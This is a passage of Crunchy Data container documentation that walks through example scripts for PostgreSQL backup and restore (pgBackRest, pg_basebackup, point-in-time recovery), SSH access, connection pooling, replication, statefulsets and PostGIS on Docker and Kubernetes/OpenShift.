$CCPROOT\/examples\/docker\/backrest\/pitr\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore container with pgBackRest configured for PITR restore\n\npgBackRest will restore the `pgdata` volume mounted to the restore container\nto the point in time specified by the `PITR_TARGET` environment variable. To get\na compliant timestamp, PostgreSQL can be queried using the following SQL:\n\n....\npsql -U postgres -Atc 'select current_timestamp'\n....\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/pitr\n.\/post-restore.sh\n....\n\n===== Full\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/full\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore pod with pgBackRest configured for full restore\n * New Volume for the PGDATA directory (full restores require PGDATA to be empty)\n\npgBackRest will restore all files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/full\n.\/post-restore.sh\n....\n\n===== Delta\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore pod with pgBackRest configured for full restore\n\npgBackRest will restore files missing to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/post-restore.sh\n....\n\n=== pgBackRest with SSHD\n\nThe PostgreSQL and PostgreSQL GIS containers can enable an SSH daemon to allow developers\nto do DBA tasks on the database server without the need for exec privileges. An administrator\nwho deploys the SSHD enabled PostgreSQL database can specify the authorized public keys for\naccess to the database server.\n\nIn order to activate SSHD in the PostgreSQL containers, the following files need to be\nmounted to the PostgreSQL container:\n\n- SSH Host keys mounted on the \/sshd volume. Three keys are required:\n\n * ssh_host_rsa_key\n * ssh_host_ecdsa_key\n * ssh_host_ed25519_key\n\n- sshd_config mounted on the \/pgconf volume\n- authorized_keys mounted on the \/pgconf volume\n\nSSHD can be enabled in the PostgreSQL containers by adding the following line:\n....\nENABLE_SSHD=true\n....\n\nThe *authorized_keys* file is mounted on the *\/pgconf* directory. In order to support\nusing this mount for authentication the following must be set in *sshd_config*:\n....\nAuthorizedKeysFile \/pgconf\/authorized_keys\nStrictModes no\n....\n\nFor OpenShift deployments, the following configuration needs to be set in *sshd_config*:\n....\nUsePAM no\n....\n\n==== Docker\n\nStart the example as follows:\n\n....\ncd $CCPROOT\/examples\/docker\/postgres-sshd\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * A volume named pgconf which contains the pgbackrest.conf, pg_hba.conf, postgresql.conf, sshd_config, authorized_keys file\n * A volume named sshd containing the SSH Host keys\n * postgres-sshd container pgbackrest archive and sshd enabled. An initial stanza db will be created on initialization\n\nAfter running the example, SSH to the container using the forwarded port 2022:\n\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@0.0.0.0\n....\n\n==== Kubernetes \/ OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/postgres-sshd\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * A configMap named pgconf which contains the pgbackrest.conf, pg_hba.conf, postgresql.conf, sshd_config, authorized_keys file\n * A secret named sshd-secrets containing the SSH Host keys\n * postgres-sshd pod with pgbackrest archive and sshd enabled. An initial stanza db will be created on initialization\n * postgres-sshd service with port 2022 for SSH\n\nAfter running the example, SSH to the service using the postgres-sshd service available in Kubernetes:\n\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd\n....\n\n==== Using pgBackrest via SSH\n\nIf a pgbackrest.conf file is located on the \/pgconf volume and archiving is enabled, it's possible to\nrun backups using the pgBackrest utility.\n\nWith the SSHD service running, the following command will issue a pgBackrest backup.\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd pgbackrest --stanza=db backup\n....\n\nTo list all the available pgBackrest backups, run the following:\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd pgbackrest info\n....\n\n=== pg_basebackup\n\nThe script assumes you are going to backup the *primary*\ncontainer created in the first example, so you need to ensure\nthat container is running. This example assumes you have configured storage as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration documentation]. Things to point out with this example\ninclude its use of persistent volumes and volume claims to store the backup data files.\n\nA successful backup will perform `pg_basebackup` on the *primary* container and store\nthe backup in the `$CCP_STORAGE_PATH` volume under a directory named `primary-backups`. Each\nbackup will be stored in a subdirectory with a timestamp as the name, allowing any number of backups to be kept.\n\nThe backup script will do the following:\n\n* Start up a backup container named backup\n* Run `pg_basebackup` on the container named *primary*\n* Store the backup in the `\/tmp\/backups\/primary-backups` directory\n* Exit after the backup\n\nWhen you are ready to restore from the backup, the restore example runs a PostgreSQL container\nusing the backup location. Upon initialization, the container will use rsync to copy the backup\ndata to this new container and then launch PostgreSQL using the original backed-up data.\n\nThe restore script will do the following:\n\n* Start up a container named *restore*\n* Copy the backup files from the previous backup example into `\/pgdata`\n* Start up the container using the backup files\n* Map the PostgreSQL port of 5432 in the container to your local host port of 12001\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the backup with this command:\n....\ncd $CCPROOT\/examples\/docker\/backup\n.\/run.sh\n....\n\nWhen you're ready to restore, a *restore* example is provided.\n\nIt's required to specified a backup path for this example. To get the correct path\ncheck the `backup` job logs or a timestamp:\n\n....\ndocker logs backup-vpk9l | grep BACKUP_PATH\nWed May 9 20:32:00 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/primary-backups\/2018-05-09-20-32-00.\n....\n\nBACKUP_PATH can also be discovered by looking at the backup mount directly (if access\nto the storage is available to the user).\n\nAn example of BACKUP_PATH is as followed:\n....\n\"name\": \"BACKUP_PATH\",\n\"value\": \"primary-backups\/2018-05-09-20-32-00\"\n....\n\nWhen you are ready to restore from the backup created, run the following example:\n....\ncd $CCPROOT\/examples\/docker\/restore\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/backup\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nWhen you're ready to restore, a *restore* example is provided.\n\nIt's required to specified a backup path for this example. To get the correct path\ncheck the `backup` job logs or a timestamp:\n....\nkubectl logs backup-vpk9l | grep BACKUP_PATH\nWed May 9 20:32:00 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/primary-backups\/2018-05-09-20-32-00.\n....\n\nBACKUP_PATH can also be discovered by looking at the backup mount directly (if access\nto the storage is available to the user).\n\nAn example of BACKUP_PATH defined as a variable within the JSON script is as follows:\n....\n\"name\": \"BACKUP_PATH\",\n\"value\": \"primary-backups\/2018-05-09-20-32-00\"\n....\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/restore\n.\/run.sh\n....\n\nTest the restored database as follows:\n....\npsql -h restore -U postgres postgres\n....\n\n=== Point in Time Recovery (PITR)\n\nPITR (point-in-time-recovery) is a feature that allows for recreating a database\nfrom backup and log files at a certain point in time. This is done using a write\nahead log (WAL) which is kept in the `pg_wal` directory within `PGDATA`. Changes\nmade to the database files over time are recorded in these log files, which allows\nit to be used for disaster recovery purposes.\n\nWhen using PITR as a backup method, in order to restore from the last checkpoint in\nthe event of a database or system failure, it is only necessary to save these log\nfiles plus a full backup. This provides an additional advantage in that it is not\nnecessary to keep multiple full backups on hand, which consume space and time to create.\nThis is because point in time recovery allows you to \"replay\" the log files and recover\nyour database to any point since the last full backup.\n\nMore detailed information about Write Ahead Log (WAL) archiving can be found\nlink:https:\/\/www.postgresql.org\/docs\/10\/static\/continuous-archiving.html[here.]\n\nBy default in the crunchy-postgres container, WAL logging is *not* enabled.\nTo enable WAL logging *outside of this example*, set the following environment\nvariables when starting the crunchy-postgres container:\n....\nARCHIVE_MODE=on\nARCHIVE_TIMEOUT=60\n....\n\nThese variables set the same name settings within the `postgresql.conf`\nfile that is used by the database. When set, WAL files generated by the database\nwill be written out to the `\/pgwal` mount point.\n\nA full backup is required to do a PITR. crunchy-backup currently\nperforms this role within the example, running a `pg_basebackup` on the database.\nThis is a requirement for PITR. After a backup is performed, code is added into\ncrunchy-postgres which will also check to see if you want to do a PITR.\n\nThere are three volume mounts used with the PITR example.\n\n* `\/recover` - When specified within a crunchy-postgres container, PITR is activated during container startup.\n* `\/backup` - This is used to find the base backup you want to recover from.\n* `\/pgwal` - This volume is used to write out new WAL files from the newly restored database container.\n\nSome environment variables used to manipulate the point in time recovery logic:\n\n* The `RECOVERY_TARGET_NAME` environment variable is used to tell the PITR logic what the name of the target is.\n* `RECOVERY_TARGET_TIME` is also an optional environment variable that restores using a known time stamp.\n\nIf you don't specify either of these environment variables, then the PITR logic will assume you want to\nrestore using all the WAL files or essentially the last known recovery point.\n\nThe `RECOVERY_TARGET_INCLUSIVE` environment variable is also available to\nlet you control the setting of the `recovery.conf` setting `recovery_target_inclusive`.\nIf you do not set this environment variable the default is *true*.\n\nOnce you recover a database using PITR, it will be in read-only mode. To\nmake the database resume as a writable database, run the following SQL command:\n....\npostgres=# select pg_wal_replay_resume();\n....\n\n{{% notice tip %}}\nIf you're running the PITR example for *PostgreSQL versions 9.5 or 9.6*, please note that\nstarting in PostgreSQL version 10, the `pg_xlog` directory was renamed to `pg_wal`. Additionally, all usages\nof the function `pg_xlog_replay_resume` were changed to `pg_wal_replay_resume`.\n{{% \/notice %}}\n\nIt takes about 1 minute for the database to become ready for use after initially starting.\n\n{{% notice warning %}}\nWAL segment files are written to the *\/tmp* directory. Leaving the example running\nfor a long time could fill up your \/tmp directory.\n{{% \/notice %}}\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate a database container as follows:\n....\ncd $CCPROOT\/examples\/docker\/pitr\n.\/run-pitr.sh\n....\n\nNext, we will create a base backup of that database using this:\n....\n.\/run-backup-pitr.sh\n....\n\nAfter creating the base backup of the database, WAL segment files are created every 60 seconds\nthat contain any database changes. These segments are stored in the\n`\/tmp\/pitr\/pitr\/pg_wal` directory.\n\nNext, create some recovery targets within the database by running\nthe SQL commands against the *pitr* database as follows:\n....\n.\/run-sql.sh\n....\n\nThis will create recovery targets named `beforechanges`, `afterchanges`, and\n`nomorechanges`. It will create a table, *pitrtest*, between\nthe `beforechanges` and `afterchanges` targets. It will also run a SQL\n`CHECKPOINT` to flush out the changes to WAL segments. These labels can be\nused to mark the points in the recovery process that will be referenced when\ncreating the restored database.\n\nNext, now that we have a base backup and a set of WAL files containing\nour database changes, we can shut down the *pitr* database\nto simulate a database failure. Do this by running the following:\n....\ndocker stop pitr\n....\n\nNext, let's edit the restore script to use the base backup files\ncreated in the step above. You can view the backup path name\nunder the `\/tmp\/backups\/pitr-backups\/` directory. You will see\nanother directory inside of this path with a name similar to\n`2018-03-21-21-03-29`. Copy and paste that value into the\n`run-restore-pitr.sh` script in the `BACKUP` environment variable.\n\nAfter that, run the script.\n....\nvi .\/run-restore-pitr.sh\n.\/run-restore-pitr.sh\n....\n\nThe WAL segments are read and applied when restoring from the database\nbackup. At this point, you should be able to verify that the\ndatabase was restored to the point before creating the test table:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\n....\n\nThis SQL command should show that the pitrtest table does not exist\nat this recovery time. The output should be similar to:\n....\nERROR: relation \"pitrtest\" does not exist\n....\n\nPostgreSQL allows you to pause the recovery process if the target name\nor time is specified. This pause would allow a DBA a chance to review\nthe recovery time\/name and see if this is what they want or expect. If so,\nthe DBA can run the following command to resume and complete the recovery:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'select pg_wal_replay_resume()'\n....\n\nUntil you run the statement above, the database will be left in read-only\nmode.\n\nNext, run the script to restore the database\nto the `afterchanges` restore point. Update the `RECOVERY_TARGET_NAME` to `afterchanges`:\n....\nvi .\/run-restore-pitr.sh\n.\/run-restore-pitr.sh\n....\n\nAfter this restore, you should be able to see the test table:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'select pg_wal_replay_resume()'\n....\n\nLastly, start a recovery using all of the WAL files. This will get the\nrestored database as current as possible. To do so, edit the script\nto remove the `RECOVERY_TARGET_NAME` environment setting completely:\n....\n.\/run-restore-pitr.sh\nsleep 30\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'create table foo (id int)'\n....\n\nAt this point, you should be able to create new data in the restored database\nand the test table should be present. When you recover the entire\nWAL history, resuming the recovery is not necessary to enable writes.\n\n==== Kubernetes and OpenShift\n\nStart by running the example database container:\n....\ncd $CCPROOT\/examples\/kube\/pitr\n.\/run-pitr.sh\n....\n\nThis step will create a database container, *pitr*. This\ncontainer is configured to continuously write WAL segment files\nto a mounted volume (`\/pgwal`).\n\nAfter you start the database, you will create a base backup\nusing this command:\n....\n.\/run-backup-pitr.sh\n....\n\nThis will create a backup and write the backup files to a persistent\nvolume (`\/pgbackup`).\n\nNext, create some recovery targets within the database by running\nthe SQL commands against the *pitr* database as follows:\n....\n.\/run-sql.sh\n....\n\nThis will create recovery targets named `beforechanges`, `afterchanges`, and\n`nomorechanges`. It will create a table, *pitrtest*, between\nthe `beforechanges` and `afterchanges` targets. It will also run a SQL\n`CHECKPOINT` to flush out the changes to WAL segments.\n\nNext, now that we have a base backup and a set of WAL files containing\nour database changes, we can shut down the *pitr* database\nto simulate a database failure. Do this by running the following:\n....\n${CCP_CLI} delete pod pitr\n....\n\nNext, we will create 3 different restored database containers based\nupon the base backup and the saved WAL files.\n\nFirst, get the BACKUP_PATH created by the `backup-pitr` example by viewing the pods logs:\n\n....\n${CCP_CLI} logs backup-pitr-8sfkh | grep PATH\nThu May 10 18:07:58 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/pitr-backups\/2018-05-10-18-07-58.\n....\n\nEdit the `restore-pitr.json` file and change the `BACKUP_PATH` environment variable\nusing the path discovered above (note: `\/pgdata\/` is not required and should be excluded\nin the variable):\n\n....\n{\n \"name\": \"BACKUP_PATH\",\n \"value\": \"pitr-backups\/2018-05-10-18-07-58\"\n{\n....\n\nNext, we restore prior to the `beforechanges` recovery target. This\nrecovery point is *before* the *pitrtest* table is created.\n\nEdit the `restore-pitr.json` file, and edit the environment\nvariable to indicate we want to use the `beforechanges` recovery\npoint:\n....\n{\n \"name\": \"RECOVERY_TARGET_NAME\",\n \"value\": \"beforechanges\"\n{\n....\n\n\nThen run the following to create the restored database container:\n....\n.\/run-restore-pitr.sh\n....\n\nAfter the database has restored, you should be able to perform\na test to see if the recovery worked as expected:\n....\npsql -h restore-pitr -U postgres postgres -c 'table pitrtest'\npsql -h restore-pitr -U postgres postgres -c 'create table foo (id int)'\n....\n\nThe output of these commands should show that the *pitrtest* table is not\npresent. It should also show that you can not create a new table\nbecause the database is paused in read-only mode.\n\nTo make the database resume as a writable database, run the following\nSQL command:\n....\nselect pg_wal_replay_resume();\n....\n\nIt should then be possible to write to the database:\n....\npsql -h restore-pitr -U postgres postgres -c 'create table foo (id int)'\n....\n\nYou can also test that if `afterchanges` is specified, that the\n*pitrtest* table is present but that the database is still in recovery\nmode.\n\nLastly, you can test a full recovery using *all* of the WAL files, if\nyou remove the `RECOVERY_TARGET_NAME` environment variable completely.\n\nThe storage portions of this example can all be found under `$CCP_STORAGE_PATH`.\n\n== Connection Pooling\n\n=== pgBouncer\n\nCrunchy pgBouncer is a lightweight connection pooler for PostgreSQL databases.\n\nThe following examples create the following containers:\n\n * pgBouncer Primary\n * pgBouncer Replica\n * PostgreSQL Primary\n * PostgreSQL Replica\n\nIn Kubernetes and OpenShift, this example will also create:\n\n * pgBouncer Primary Service\n * pgBouncer Replica Service\n * Primary Service\n * Replica Service\n * PostgreSQL Secrets\n * pgBouncer Secrets\n\nTo cleanup the objects created by this example, run the following in the `pgbouncer` example directory:\n\n....\n.\/cleanup.sh\n....\n\n{{% notice tip %}}\nFor more information on `pgBouncer`, see the link:https:\/\/pgbouncer.github.io[official website].\n{{% \/notice %}}\n\n==== Docker\n\nRun the `pgbouncer` example:\n....\ncd $CCPROOT\/examples\/docker\/pgbouncer\n.\/run.sh\n....\n\nOnce all containers have deployed and are ready for use, `psql` to the target\ndatabases through `pgBouncer`:\n\n....\npsql -d userdb -h 0.0.0.0 -p 6432 -U testuser\npsql -d userdb -h 0.0.0.0 -p 6433 -U testuser\n....\n\nTo connect to the administration database within `pgbouncer`, connect using `psql`:\n\n....\npsql -d pgbouncer -h 0.0.0.0 -p 6432 -U pgbouncer\npsql -d pgbouncer -h 0.0.0.0 -p 6433 -U pgbouncer\n....\n\n==== Kubernetes and OpenShift\n\n{{% notice tip %}}\nOpenShift: If custom configurations aren't being mounted, an *emptydir* volume is required\nto be mounted at `\/pgconf`.\n{{% \/notice %}}\n\nRun the `pgbouncer` example:\n....\ncd $CCPROOT\/examples\/kube\/pgbouncer\n.\/run.sh\n....\n\nOnce all containers have deployed and are ready for use, `psql` to the target\ndatabases through `pgBouncer`:\n\n....\npsql -d userdb -h pgbouncer-primary -p 6432 -U testuser\npsql -d userdb -h pgbouncer-replica -p 6432 -U testuser\n....\n\nTo connect to the administration database within `pgbouncer`, connect using `psql`:\n\n....\npsql -d pgbouncer -h pgbouncer-primary -p 6432 -U pgbouncer -c \"SHOW SERVERS\"\npsql -d pgbouncer -h pgbouncer-replica -p 6432 -U pgbouncer -c \"SHOW SERVERS\"\n....\n\n=== pgPool II\n\nAn example is provided that will run a *pgPool II* container in conjunction with the\n*primary-replica* example provided above.\n\nYou can execute both `INSERT` and `SELECT` statements after connecting to pgpool.\nThe container will direct `INSERT` statements to the primary and `SELECT` statements\nwill be sent round-robin to both the primary and replica.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nYou can view the nodes that pgpool is configured for by running:\n....\npsql -h pgpool -U testuser userdb -c 'show pool_nodes'\n....\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate the container as follows:\n....\ncd $CCPROOT\/examples\/docker\/pgpool\n.\/run.sh\n....\n\nThe example is configured to allow the *testuser* to connect\nto the *userdb* database.\n....\npsql -h localhost -U testuser -p 12003 userdb\n....\n\n==== Kubernetes and OpenShift\n\nRun the following command to deploy the pgpool service:\n....\ncd $CCPROOT\/examples\/kube\/pgpool\n.\/run.sh\n....\n\nThe example is configured to allow the *testuser* to connect\nto the *userdb* database.\n....\npsql -h pgpool -U testuser userdb\n....\n\n== Database\n\n=== Single Primary\n\nThis example starts a single PostgreSQL container and service, the most simple\nof examples.\n\nThe container creates a default database called *userdb*, a default user called *testuser*\nand a default password of *password*.\n\nFor all environments, the script additionally creates:\n\n * A persistent volume claim\n * A crunchy-postgres container named *primary*\n * The database using predefined environment variables\n\nAnd specifically for the Kubernetes and OpenShift environments:\n\n * A pod named *primary*\n * A service named *primary*\n * A PVC named *primary-pgdata*\n * The database using predefined environment variables\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo create the example and run the container:\n....\ncd $CCPROOT\/examples\/docker\/primary\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h localhost -U testuser -W userdb\n....\n\n==== Kubernetes and OpenShift\n\nTo create the example:\n....\ncd $CCPROOT\/examples\/kube\/primary\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h primary -U postgres postgres\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to run this\nexample using Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/primary\/README.md[here].\n\n=== PostgreSQL Deployment\n\nStarting in release 1.2.8, the PostgreSQL container can accept\nan environment variable named `PGDATA_PATH_OVERRIDE`. If set,\nthe `\/pgdata\/subdir` path will use a subdirectory name of your\nchoosing instead of the default which is the hostname of the container.\n\nThis example shows how a Deployment of a PostgreSQL primary is\nsupported. A pod is a deployment that uses a hostname generated by\nKubernetes; because of this, a new hostname will be defined upon\nrestart of the primary pod.\n\nFor finding the `\/pgdata` that pertains to the pod, you will need\nto specify a `\/pgdata\/subdir` name that never changes. This requirement is\nhandled by the `PGDATA_PATH_OVERRIDE` environment variable.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nThis example will create the following in your Kubernetes and OpenShift environments:\n\n * primary and replica services\n * primary-deployment deployment\n * replica-deployment statefulset\n * ConfigMap to hold a custom `postgresql.conf`, `setup.sql`, and\n `pg_hba.conf` files\n * Secrets for the primary user, superuser, and normal user to\n hold the passwords\n * Volume mount for `\/backrestrepo` and `\/pgwal`\n\nThe persisted data for the PostgreSQL primary is found under `\/pgdata\/primary-deployment`.\nIf you delete the primary pod, the deployment will create another\npod for the primary and will be able to start up immediately since\nit works out of the same `\/pgdata\/primary-deployment` data directory.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/primary-deployment\n.\/run.sh\n....\n\nTo scale the replica statefulset, run the following command:\n\n....\n${CCP_CLI?} scale --replicas=2 statefulset replica-deployment\n....\n\n{{% notice warning %}}\nThis example only creates enough Persistent Volumes for a maximum of 2 replicas.\nIf you are not using storage classes, the maximum amount of replicas this example can\nbe scaled to is 2.\n{{% \/notice %}}\n\n=== Replication\n\nThis example starts a primary and a replica pod containing a PostgreSQL database.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nFor the Docker environment, the script additionally creates:\n\n * A docker volume using the local driver for the primary\n * A docker volume using the local driver for the replica\n * A container named *primary* binding to port 12007\n * A container named *replica* binding to port 12008\n * A mapping of the PostgreSQL port 5432 within the container to the localhost port 12000\n * The database using predefined environment variables\n\nAnd specifically for the Kubernetes and OpenShift environments:\n\n * emptyDir volumes for persistence\n * A pod named *pr-primary*\n * A pod named *pr-replica*\n * A pod named *pr-replica-2*\n * A service named *pr-primary*\n * A service named *pr-replica*\n * The database using predefined environment variables\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo create the example and run the container:\n....\ncd $CCPROOT\/examples\/docker\/primary-replica\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h localhost -p 12007 -U testuser -W userdb\npsql -h localhost -p 12008 -U testuser -W userdb\n....\n\n==== Kubernetes and OpenShift\n\nRun the following command to deploy a primary and replica database cluster:\n\n....\ncd $CCPROOT\/examples\/kube\/primary-replica\n.\/run.sh\n....\n\nIt takes about a minute for the replica to begin replicating with the\nprimary. To test out replication, see if replication is underway\nwith this command:\n\n....\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'table pg_stat_replication'\n....\n\nIf you see a line returned from that query it means the primary is replicating\nto the replica. Try creating some data on the primary:\n\n....\n\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'create table foo (id int)'\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'insert into foo values (1)'\n....\n\nThen verify that the data is replicated to the replica:\n\n....\n${CCP_CLI?} exec -ti pr-replica -- psql -d postgres -c 'table foo'\n....\n\n*primary-replica-dc*\n\nIf you wanted to experiment with scaling up the number of replicas, you can run the following example:\n\n....\ncd $CCPROOT\/examples\/kube\/primary-replica-dc\n.\/run.sh\n....\n\nYou can verify that replication is working using the same commands as above.\n\n....\n${CCP_CLI?} exec -ti primary-dc -- psql -d postgres -c 'table pg_stat_replication'\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to run this example\nusing Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/primary-replica\/README.md[here].\n\n=== Synchronous Replication\n\nThis example deploys a PostgreSQL cluster with a primary, a synchronous replica, and\nan asynchronous replica. The two replicas share the same service.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/sync\n.\/run.sh\n....\n\nYou can test the replication status on the primary by using the following command\nand the password *password*:\n....\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'table pg_stat_replication'\n....\n\nYou should see 2 rows; 1 for the asynchronous replica and 1 for the synchronous replica. The\n`sync_state` column shows values of async or sync.\n\nYou can test replication to the replicas by first entering some data on\nthe primary, and secondly querying the replicas for that data:\n....\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'create table foo (id int)'\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'insert into foo values (1)'\npsql -h 127.0.0.1 -p 12011 -U postgres postgres -c 'table foo'\npsql -h 127.0.0.1 -p 12012 -U postgres postgres -c 'table foo'\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/sync\n.\/run.sh\n....\n\nConnect to the *primarysync* and *replicasync* databases as follows for both the\nKubernetes and OpenShift environments:\n....\npsql -h primarysync -U postgres postgres -c 'create table test (id int)'\npsql -h primarysync -U postgres postgres -c 'insert into test values (1)'\npsql -h primarysync -U postgres postgres -c 'table pg_stat_replication'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\n....\n\nThis set of queries will show you the IP address of the PostgreSQL replica\ncontainer. Note the changing IP address due to the round-robin service proxy\nbeing used for both replicas. The example queries also show that both\nreplicas are replicating successfully from the primary.\n\n=== Statefulsets\n\nThis example deploys a statefulset named *statefulset*. The statefulset\nis a new feature in Kubernetes as of version 1.5 and in OpenShift Origin as of\nversion 3.5. Statefulsets have replaced PetSets going forward.\n\nPlease view link:https:\/\/kubernetes.io\/docs\/concepts\/abstractions\/controllers\/statefulsets\/[this Kubernetes description]\nto better understand what a Statefulset is and how it works.\n\nThis example creates 2 PostgreSQL containers to form the set. At\nstartup, each container will examine its hostname to determine\nif it is the first container within the set of containers.\n\nThe first container is determined by the hostname suffix assigned\nby Kubernetes to the pod. This is an ordinal value starting with *0*.\nIf a container sees that it has an ordinal value of *0*, it will\nupdate the container labels to add a new label of:\n....\nname=$PG_PRIMARY_HOST\n....\n\nIn this example, `PG_PRIMARY_HOST` is specified as `statefulset-primary`.\n\nBy default, the containers specify a value of `name=statefulset-replica`.\n\nThere are 2 services that end user applications will use to\naccess the PostgreSQL cluster, one service (statefulset-primary) routes to the primary\ncontainer and the other (statefulset-replica) to the replica containers.\n....\n$ ${CCP_CLI} get service\nNAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE\nkubernetes 10.96.0.1 <none> 443\/TCP 22h\nstatefulset None <none> 5432\/TCP 1h\nstatefulset-primary 10.97.168.138 <none> 5432\/TCP 1h\nstatefulset-replica 10.97.218.221 <none> 5432\/TCP 1h\n....\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/statefulset\n.\/run.sh\n....\n\nYou can access the primary database as follows:\n....\npsql -h statefulset-primary -U postgres postgres\n....\n\nYou can access the replica databases as follows:\n....\npsql -h statefulset-replica -U postgres postgres\n....\n\nYou can scale the number of containers using this command; this will\nessentially create an additional replica database.\n....\n${CCP_CLI} scale --replicas=3 statefulset statefulset\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to\nrun this example using Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/statefulset\/README.md[here].\n\n=== Geospatial (PostGIS)\n\nAn example is provided that will run a PostgreSQL with PostGIS pod and service in Kubernetes and OpenShift and a container in Docker.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nYou can view the extensions that postgres-gis has enabled by running the following command and viewing the listed PostGIS packages:\n....\npsql -h postgres-gis -U testuser userdb -c '\\dx'\n....\n\nTo validate that PostGIS is installed and which version is running, run the command:\n\n....\npsql -h postgres-gis -U testuser userdb -c \"SELECT postgis_full_version();\"\n....\n\nYou should expect to see output similar to:\n\n....\npostgis_full_version\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n POSTGIS=\"2.4.2 r16113\" PGSQL=\"100\" GEOS=\"3.5.0-CAPI-1.9.0 r4084\" PROJ=\"Rel. 4.8.0, 6 March 2012\" GDAL=\"GDAL 1.11.4, released 2016\/01\/25\" LIBXML=\"2.9.1\" LIBJSON=\"0.11\" TOPOLOGY RASTER\n(1 row)\n....\n\nAs an exercise for invoking some of the basic PostGIS functionality for validation, try defining a 2D geometry point while giving inputs of\nlongitude and latitude through this command.\n\n....\npsql -h postgres-gis -U testuser userdb -c \"select ST_MakePoint(28.385200,-81.563900);\"\n....\n\nYou should expect to see output similar to:\n\n....\n st_makepoint\n--------------------------------------------\n 0101000000516B9A779C623C40B98D06F0166454C0\n(1 row)\n....\n\nTo shutdown the instance and remove the container for each example, run the 